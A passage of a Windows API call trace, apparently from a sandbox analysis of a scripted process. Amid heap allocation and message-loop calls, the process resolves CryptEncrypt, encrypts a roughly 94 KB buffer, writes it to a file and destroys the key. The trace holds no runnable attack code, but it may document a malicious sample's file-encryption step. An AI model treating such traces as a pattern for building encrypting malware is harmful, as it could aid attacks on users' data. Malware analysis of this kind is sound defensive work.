[0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38a8 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38c0 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ee0) returned 0x4906f48 [0081.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38f0 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0081.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43c3a28 [0081.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3a28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0081.856] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e088*=0x16ee0, dwBufLen=0x16ef0 | out: pbData=0x48f0048*, pdwDataLen=0x144e088*=0x16ef0) returned 1 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a88 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3920 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38f0 [0081.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0081.856] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.858] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x16ef0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ea8c*=0x16ef0, lpOverlapped=0x0) returned 1 [0081.861] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0081.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb0a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0081.862] CryptDestroyKey (hKey=0x41ac040) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0081.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0081.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0081.863] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0081.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0081.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.864] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.864] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0081.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2e8 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0081.864] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0081.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0081.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0081.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0a8 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.865] PeekMessageW (in: lpMsg=0x144e404, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e404) returned 0 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb378 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb330 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb348 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb360 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0c0 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb168 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb180 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0081.866] PeekMessageW (in: lpMsg=0x144e404, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e404) returned 0 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.866] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0081.866] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb300 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0081.866] PeekMessageW (in: lpMsg=0x144e23c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e23c) returned 0 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0081.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0081.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0081.867] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0081.867] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.867] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0081.867] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0081.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0081.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, 